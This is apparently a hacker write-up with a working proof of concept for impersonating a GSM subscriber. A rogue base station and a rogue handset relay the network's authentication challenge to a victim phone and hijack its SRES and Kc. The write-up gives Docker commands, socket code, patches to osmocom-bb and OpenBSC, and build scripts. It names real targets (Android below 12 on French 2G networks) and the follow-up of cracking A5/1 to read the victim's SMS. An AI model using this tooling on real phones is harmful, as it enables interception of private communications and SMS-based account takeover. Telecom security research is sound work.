Impersonnate

Hacking 2G BTS

The UE has become an MS again and we know how to be a BTS !

But even in the BTS does not authenticate MS does in front of the BTS. How can we bypass this ? By respecting the attack flow above ;)

I mean the secret is the key Ki stored on the SIM even with physical access you can't crack it thanks to the chip inventor ! But we can fool the authentication process : The original process is :

  • The BTS send a rand,key_sequence to the MS.
  • The MS respond SRes = f(ki,rand)
  • The MS cipher the communication with Kc= f(Ki,rand,key_seq)

The hacked process is : - The genuine BTS send a rand,key_seq to the Evil MS. - The Evil MS send it to our Evil BTS via socket between Evil BTS server and Evil MS client. - The Evil BTS send the rand,key_seq to genuine MS - The Genuine MS respond sres -> Evil BTS -> Evil MS -> Genuine BTS - In the example video Kc is forwarded between Genuine MS-> Evil MS

Impersonnate PoC

With french explanations ;) sorry…

Impersonalisaion (français)

With english explanation (now ;) Impersonate (english)

https://imgur.com/lUjkpGp First of all there is a bug with brltty so

apt remove brltty

on host (not on docker !) Launch 1st

sudo docker run -it --privileged --user root --cap-add ALL  -v /dev/bus/usb:/dev/bus/usb bastienbaranoff/ms-final:hell_yeah

Launch 2nd

sudo docker run -it --privileged --user root --cap-add ALL  -v /dev/bus/usb:/dev/bus/usb bastienbaranoff/bts-final:hell_yeah

In this order cause need ip 172.17.0.2 for ms and 172.17.0.3 for bts (socket are made to work with theses addresses)

in bts

tmux
cd /
service pcscd start
./evil-bts.sh

` then in ms :

tmux
cd /
bash trx.sh
ctrl-b c 
./evil-ms.sh

set IMSI in OpenBSC (via telnet) and in /root/.osmocom/bb/mobile.cfg and set any ki but set one in OpenBSC need a motorola c1** and a sim reader

What happen next ?

Crack A5/1

5s to crack it before the Kc ciphered channel timeout has been gone and if it is done we have incomming SMS.

Targets android < 12, telco 2G until 2025 in France

Thank for reading !

Clients-servers architecture :

bsc-2rfa 172.17.0.2 server rand 888 listen on 0.0.0.0 client sres 666 -> 172.17.0.3

bb-2rfa 172.17.0.3 client rand 888 -> 172.17.0.2 server sres 666 listen on 0.0.0.0 server kc 777 listen on 0.0.0.0

osmocom-genuine-ms 172.17.0.2 client kc 777 -> 172.17.0.3

Headers :

suppress_space.h

#include <stdio.h>
char res[100];
char* spaces(char str [])
{
int i = 0;int j = 0;
   while (str[i] != '\0')
   {
  if ((str[i] == ' ') != 1) {
res[j] = str[i];
j++;
  }
  i++;
   }
   res[j] = '\0';
return res;}

hex.h

/*
 * Read hex strings and output as text.
 *
 * No checking of the characters is done, but the strings must have an even
 * length.
 *
 * $Id: hex2ascii.c,v 1.1 2009/09/19 23:56:49 grog Exp $
 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include "suppress_space.h"
char hexdigit (char c)
{
  char outc;

  outc = c -'0';
  if (outc > 9) /* A - F or a - f */
outc -= 7;  /* A - F */
  if (outc > 15)/* a - f? */
outc -= 32;
  if ((outc > 15) || (outc < 0))
  {
fprintf (stderr, "Invalid character %c, aborting\n", c);
exit (1);
  }
  return outc;
}
char ascii[17];
const unsigned char* hex2ascii(char hexval[])
{  int arg;
  char *c=spaces(hexval);
  int sl;
  char oc;

  for (arg = 0; arg < 17; arg++)
  {
sl = strlen (c);
if (sl & 1) /* odd length */
{
  fprintf (stderr,
   "%s is %d chars long, must be even\n",
   c,
   sl );
  return "prout";
}int i=0;
while (*c)
{
  oc = (hexdigit (*c++) << 4) + hexdigit (*c++);
  fputc (oc, stdout);
  strcat(ascii,&oc);
}
  }
return ascii;}

client.h (respect address and port of client server arch)

/**
 * Example taken from CS 241 @ UIUC
 * Edited by Austin Walters
 * Used as example for austingwalters.com,
 * in socket IPC explanation.
 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netdb.h>
#include <unistd.h>

void client(char buffer[]){

  int sock_fd = socket(AF_INET, SOCK_STREAM, 0);

  struct addrinfo info, *result;
  memset(&info, 0, sizeof(struct addrinfo));
  info.ai_family = AF_INET;
  info.ai_socktype = SOCK_STREAM;

  if(0 != getaddrinfo("172.17.0.3", "888", &info, &result))
exit(1);
  
  /* Connects to bound socket on the server */  
  connect(sock_fd, result->ai_addr, result->ai_addrlen);

  printf("SENDING: %s", buffer);
  write(sock_fd, buffer, strlen(buffer));

  char resp[999];
  int len = strlen(buffer);
  resp[len] = '\0';
  printf("%s\n", resp);
}

server.h (respect variable length : 13 for sres, 25 for kc, 51 for rand, and port from arch client-server)

/**
 * Written by Austin Walters
 * For an example on austingwalters.com,
 * on sockets
 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netdb.h>
#include <unistd.h>
char text[13];
char* catch_sres(){

  int sock_fd = socket(AF_INET, SOCK_STREAM, 0);
  struct addrinfo directives, *result;
  memset(&directives, 0, sizeof(struct addrinfo));
  directives.ai_family = AF_INET;
  directives.ai_socktype = SOCK_STREAM;
  directives.ai_flags = AI_PASSIVE;

  /* Translates IP, port, protocal into struct */
  if(0 !=  getaddrinfo("0.0.0.0", "666", &directives, &result))
exit(1);
 
  /* Binds socket to port, so we know where new connections form */
  if(bind(sock_fd, result->ai_addr, result->ai_addrlen) != 0)
  exit(1);
  /* Places socket to "listen" or "wait for stuff" state */
  if(listen(sock_fd, 10) != 0)
  exit(1);
  int i=0;
  printf("Waiting for connection on http://0.0.0.0:666 ...\n");
  while(i==0){
   
/* Accepts Connection */
char buffer[1000];
int client_fd = accept(sock_fd, NULL, NULL); 
int len = read(client_fd, buffer, 999);
buffer[len] = '\0';

char * header = "<b>You Connected to the Server!</b></br></br>";
i=i+1;
write(client_fd, header, strlen(header));

printf("=== Client Sent ===\n");
printf("%s\n", buffer);
memcpy(text,buffer,13);
close(client_fd);

  }
  return text;
}

Evil-MS :

git clone https://github.com/osmocom/osmocom-bb
git checkout fc20a37cb375dac11f45b78a446237c70f00841c
wget https://gitlab.com/francoip/thesis/raw/public/patch/thesis.patch
patch -p1 < thesis.patch
diff -ru osmocom-bb/src/host/layer23/src/mobile/gsm48_mm.c heartbreaker/bb-2rfa/src/host/layer23/src/mobile/gsm48_mm.c
--- osmocom-bb/src/host/layer23/src/mobile/gsm48_mm.c   2022-08-30 15:39:46.222274989 +0200
+++ heartbreaker/bb-2rfa/src/host/layer23/src/mobile/gsm48_mm.c 2022-08-30 15:35:55.472598046 +0200
@@ -20,6 +20,7 @@
  */
 
 #include <stdint.h>
+#include <string.h>
 #include <errno.h>
 #include <stdio.h>
 #include <string.h>
@@ -41,7 +42,7 @@
 #include <osmocom/bb/mobile/app_mobile.h>
 #include <osmocom/bb/mobile/vty.h>
 #include <osmocom/bb/mobile/dos.h>
-
+#include "client.h"
 extern void *l23_ctx;
 
 void mm_conn_free(struct gsm48_mm_conn *conn);
@@ -1662,6 +1663,15 @@
 */
if (mm->est_cause == RR_EST_CAUSE_EMERGENCY && set->emergency_imsi[0])
no_sim = 1;
+   char test2[]="1";
+   sprintf(test2, "%d", ar->key_seq);
+   char test3[3]="-";//"87 65 43 21 87 65 43 21 87 65 43 21 87 65 43 21";
+   strcat(test3,test2);
+   char test[51]="87 65 43 21 87 65 43 21 87 65 43 21 87 65 43 21";
+   strcpy(test,osmo_hexdump(ar->rand,16));
+   strcat(test,test3);
+   LOGP(DMM, LOGL_INFO, "AUTHENTICATION REQUEST (seq %s)\n", test);
+   client(test);
gsm_subscr_generate_kc(ms, ar->key_seq, ar->rand, no_sim);
 
/* wait for auth response event from SIM */
diff -ru osmocom-bb/src/host/layer23/src/mobile/subscriber.c heartbreaker/bb-2rfa/src/host/layer23/src/mobile/subscriber.c
--- osmocom-bb/src/host/layer23/src/mobile/subscriber.c 2022-08-30 15:38:53.125893570 +0200
+++ heartbreaker/bb-2rfa/src/host/layer23/src/mobile/subscriber.c   2022-08-30 15:35:55.476598075 +0200
@@ -30,6 +30,11 @@
 #include <osmocom/bb/common/osmocom_data.h>
 #include <osmocom/bb/common/networks.h>
 #include <osmocom/bb/mobile/vty.h>
+#include "server.h"
+#include "server2.h"
+#include "hex.h"
+#include "hex2.h"
+
 
 /* enable to get an empty list of forbidden PLMNs, even if stored on SIM.
  * if list is changed, the result is not written back to SIM */
@@ -945,14 +950,21 @@
 
/* store sequence */
subscr->key_seq = key_seq;
-   memcpy(subscr->key, vec->kc, 8);
+
 
LOGP(DMM, LOGL_INFO, "Sending authentication response\n");
+char *h4ck3d_kc;
+h4ck3d_kc = catch_kc();
+const unsigned char *my_h4ck3d_kc=hex2ascii(h4ck3d_kc);
+   char *h4ck3d_sres;
+   h4ck3d_sres = catch_sres();
+   const unsigned char *my_h4ck3d_sres=hex2ascii2(h4ck3d_sres);
+   memcpy(subscr->key, my_h4ck3d_kc, 8);
nmsg = gsm48_mmevent_msgb_alloc(GSM48_MM_EVENT_AUTH_RESPONSE);
-   if (!nmsg)
-   return -ENOMEM;
nmme = (struct gsm48_mm_event *) nmsg->data;
-   memcpy(nmme->sres, vec->sres, 4);
+   memcpy(nmme->sres,my_h4ck3d_sres, 4);
+   LOGP(DMM, LOGL_INFO, "KC hijacked = %s\n",osmo_hexdump(my_h4ck3d_kc,8));
+   LOGP(DMM, LOGL_INFO, "SRES hijacked = %s\n",osmo_hexdump(my_h4ck3d_sres,4));
gsm48_mmevent_msg(ms, nmsg);
 
return 0;

Genuine-MS (Kc Forwarding)

Patch osmocom-bb

git clone https://github.com/osmocom/osmocom-bb
git checkout fixeria/trxcon
diff -ru trx/src/host/layer23/src/mobile/gsm48_mm.c osmocom-bb/src/host/layer23/src/mobile/gsm48_mm.c
--- trx/src/host/layer23/src/mobile/gsm48_mm.c  2022-08-30 16:41:37.076916961 +0200
+++ osmocom-bb/src/host/layer23/src/mobile/gsm48_mm.c   2022-08-30 15:51:17.267099639 +0200
@@ -1651,6 +1651,7 @@
 */
if (mm->est_cause == RR_EST_CAUSE_EMERGENCY && set->emergency_imsi[0])
no_sim = 1;
+   LOGP(DMM, LOGL_INFO, "AUTHENTICATION REQUEST (rand %s)\n", osmo_hexdump(ar->rand,16));  
gsm_subscr_generate_kc(ms, ar->key_seq, ar->rand, no_sim);
 
/* wait for auth response event from SIM */
diff -ru trx/src/host/layer23/src/mobile/subscriber.c osmocom-bb/src/host/layer23/src/mobile/subscriber.c
--- trx/src/host/layer23/src/mobile/subscriber.c2022-08-30 16:41:37.076916961 +0200
+++ osmocom-bb/src/host/layer23/src/mobile/subscriber.c 2022-08-30 15:51:17.267099639 +0200
@@ -32,7 +32,7 @@
 #include <osmocom/bb/common/sap_proto.h>
 #include <osmocom/bb/common/networks.h>
 #include <osmocom/bb/mobile/vty.h>
-
+#include "client.h"
 /* enable to get an empty list of forbidden PLMNs, even if stored on SIM.
  * if list is changed, the result is not written back to SIM */
 //#define TEST_EMPTY_FPLMN
@@ -369,6 +369,7 @@
 
/* key */
memcpy(subscr->key, data, 8);
+   //client(osmo_hexdump(subscr->key,8));
 
/* key sequence */
subscr->key_seq = data[8] & 0x07;
@@ -907,7 +908,7 @@
struct msgb *nmsg;
struct sim_hdr *nsh;
 
-   /* not a SIM */
+   /* not a SIM
if (!GSM_SIM_IS_READER(subscr->sim_type)
 || !subscr->sim_valid || no_sim) {
struct gsm48_mm_event *nmme;
@@ -944,6 +945,7 @@
 
/* store sequence */
subscr->key_seq = key_seq;
+   //client(osmo_hexdump(vec->kc,8));
memcpy(subscr->key, vec->kc, 8);
 
LOGP(DMM, LOGL_INFO, "Sending authentication response\n");
@@ -969,6 +971,7 @@
 
/* random */
memcpy(msgb_put(nmsg, 16), rand, 16);
+   LOGP(DMM, LOGL_NOTICE, "Key Sequence=%d\n",key_seq);
 
/* store sequence */
subscr->key_seq = key_seq;
@@ -1019,7 +1022,9 @@
nsh->file = 0x6f20;
data = msgb_put(nmsg, 9);
memcpy(data, subscr->key, 8);
-   data[8] = subscr->key_seq;
+LOGP(DMM, LOGL_NOTICE, "KC=%s\n",osmo_hexdump(subscr->key,8));
+   client(osmo_hexdump(subscr->key,8));
+   data[8] = subscr->key;
sim_job(ms, nmsg);
 
/* return signed response */

Patch OpenBSC Evil-BTS:

git clone https://github.com/osmocom/openbsc
git checkout 3f457a3b79e2908664b40eab9ca8e70c44a54898
diff -ru openbsc/openbsc/src/libmsc/gsm_04_08.c bsc-2rfa/openbsc/src/libmsc/gsm_04_08.c
--- openbsc/openbsc/src/libmsc/gsm_04_08.c  2022-08-30 16:59:20.033455224 +0200
+++ bsc-2rfa/openbsc/src/libmsc/gsm_04_08.c 2022-08-30 15:51:17.243099474 +0200
@@ -70,7 +70,10 @@
 #include <osmocom/gsm/tlv.h>
 
 #include <assert.h>
+#include "server.h"
+#include "hex.h"
+#include "client.h"

 void *tall_locop_ctx;
 void *tall_authciphop_ctx;
 
@@ -908,6 +911,20 @@
struct msgb *msg = gsm48_msgb_alloc_name("GSM 04.08 AUTH REQ");
struct gsm48_hdr *gh = (struct gsm48_hdr *) msgb_put(msg, sizeof(*gh));
struct gsm48_auth_req *ar = (struct gsm48_auth_req *) msgb_put(msg, sizeof(*ar));
+DEBUGP(DMM, "-> AUTH REQ (rand = %s)\n", osmo_hexdump(rand, 16));
+   
+
+
+   char *test;
+   test=catch_rand();
+   printf("test %s\n",test);
+   char *randy=strtok(test," -");
+   printf("rand %s\n",rand);
+   char *kandy_seq=strtok(NULL,"-");
+   printf("key_seq %s\n",kandy_seq);
+   char *randy_magnum = spaces(randy);
+const unsigned char *randynator=hex2ascii(randy_magnum);
+memcpy(rand,randynator,16);
 
DEBUGP(DMM, "-> AUTH REQ (rand = %s)\n", osmo_hexdump(rand, 16));
if (autn)
@@ -917,7 +934,7 @@
gh->proto_discr = GSM48_PDISC_MM;
gh->msg_type = GSM48_MT_MM_AUTH_REQ;
 
-   ar->key_seq = key_seq;
+   ar->key_seq = kandy_seq;
 

Installing BTS-Evil:

git clone https://github.com/bbaranoff/heartbreaker

#!/bin/bash
mkdir /heartbreaker
cd /heartbreaker
apt install autoconf-archive libdbd-sqlite3 gcc-9 g++-9 gcc-10 g++-10 git autoconf pkg-config libtool build-essential libtalloc-dev libpcsclite-dev gnutls-dev python2 python2-dev fftw3-dev libsctp-dev libdbi-dev -y
cp /usr/bin/python2 /usr/bin/python
update-alternatives --install /usr/bin/gcc gcc /usr/bin/gcc-9 90 --slave /usr/bin/g++ g++ /usr/bin/g++-9
update-alternatives --install /usr/bin/gcc gcc /usr/bin/gcc-10 100 --slave /usr/bin/g++ g++ /usr/bin/g++-10
update-alternatives --set gcc /usr/bin/gcc-9
git clone git://git.osmocom.org/libosmocore.git
cd  libosmocore
git checkout 1.1.0
autoreconf -fi
./configure
make
make install
ldconfig
cd ..
git clone git://git.osmocom.org/libosmo-dsp.git
cd libosmo-dsp
libtoolize && autoreconf -fi
autoreconf -fi
./configure
make
make install
ldconfig
apt install -y libortp-dev
cd ..

git clone https://github.com/osmocom/osmocom-bb
cd osmocom-bb/src
git checkout fixeria/trxcon
make nofirmware

cd ../..
git clone https://github.com/osmocom/libosmo-abis
cd libosmo-abis
git checkout 0.8.1
autoreconf -fi && ./configure --disable-dahdi && make -j4 && make install && ldconfig

cd ..
git clone https://github.com/osmocom/libosmo-netif
cd libosmo-netif
git checkout 0.6.0
autoreconf -fi && ./configure && make -j4 && make install && ldconfig


cd bsc-2rfa/openbsc
autoreconf -fi && ./configure && make -j4
cd ../..
git clone https://github.com/osmocom/osmo-bts
cd osmo-bts
git checkout 0.8.1
autoreconf -fi && ./configure --enable-trx && make -j4 && make install && ldconfig

apt install ruby-libxml ruby-dev ruby-dbus
gem install serial smartcard

Installing MS-Evil :

git clone https://github.com/bbaranoff/heartbreaker

#!/bin/bash
mkdir /heartbreaker
cd /heartbreaker
apt install autoconf-archive libdbd-sqlite3 gcc-9 g++-9 gcc-10 g++-10 git autoconf pkg-config libtool build-essential libtalloc-dev libpcsclite-dev gnutls-dev python2 python2-dev fftw3-dev libsctp-dev libdbi-dev -y
cp /usr/bin/python2 /usr/bin/python
update-alternatives --install /usr/bin/gcc gcc /usr/bin/gcc-9 90 --slave /usr/bin/g++ g++ /usr/bin/g++-9
update-alternatives --install /usr/bin/gcc gcc /usr/bin/gcc-10 100 --slave /usr/bin/g++ g++ /usr/bin/g++-10
update-alternatives --set gcc /usr/bin/gcc-9
git clone git://git.osmocom.org/libosmocore.git
cd  libosmocore
git checkout 1.1.0
autoreconf -fi
./configure
make
make install
ldconfig
cd ..
git clone git://git.osmocom.org/libosmo-dsp.git
cd libosmo-dsp
libtoolize && autoreconf -fi
autoreconf -fi
./configure
make
make install
ldconfig
apt install -y libortp-dev
cd ..

git clone https://github.com/osmocom/osmocom-bb
cd osmocom-bb/src
git checkout fixeria/trxcon
make nofirmware

cd ../..
git clone https://github.com/osmocom/libosmo-abis
cd libosmo-abis
git checkout 0.8.1
autoreconf -fi && ./configure --disable-dahdi && make -j4 && make install && ldconfig

cd ..
git clone https://github.com/osmocom/libosmo-netif
cd libosmo-netif
git checkout 0.6.0
autoreconf -fi && ./configure && make -j4 && make install && ldconfig
cd ..

cd bsc-2rfa/openbsc
autoreconf -fi && ./configure && make -j4
cd ../..
git clone https://github.com/osmocom/osmo-bts
cd osmo-bts
git checkout 0.8.1
autoreconf -fi && ./configure --enable-trx && make -j4 && make install && ldconfig

apt install ruby-libxml ruby-dev ruby-dbus
gem install serial smartcard

Installing MS-Evil

#!/bin/bash
mkdir /heartbreaker
cd /heartbreaker
apt install autoconf-archive libdbd-sqlite3 gcc-9 g++-9 gcc-10 g++-10 git autoconf pkg-config libtool build-essential libtalloc-dev libpcsclite-dev gnutls-dev python2 python2-dev fftw3-dev libsctp-dev libdbi-dev -y
cp /usr/bin/python2 /usr/bin/python
update-alternatives --install /usr/bin/gcc gcc /usr/bin/gcc-9 90 --slave /usr/bin/g++ g++ /usr/bin/g++-9
update-alternatives --install /usr/bin/gcc gcc /usr/bin/gcc-10 100 --slave /usr/bin/g++ g++ /usr/bin/g++-10
update-alternatives --set gcc /usr/bin/gcc-9
git clone git://git.osmocom.org/libosmocore.git
cd  libosmocore
git checkout 0.9.0
autoreconf -fi
./configure
make
make install
ldconfig
cd ..
git clone git://git.osmocom.org/libosmo-dsp.git
cd libosmo-dsp
libtoolize && autoreconf -fi
autoreconf -fi
./configure
make
make install
ldconfig

cd ../bb-2rfa/src
make nofirmware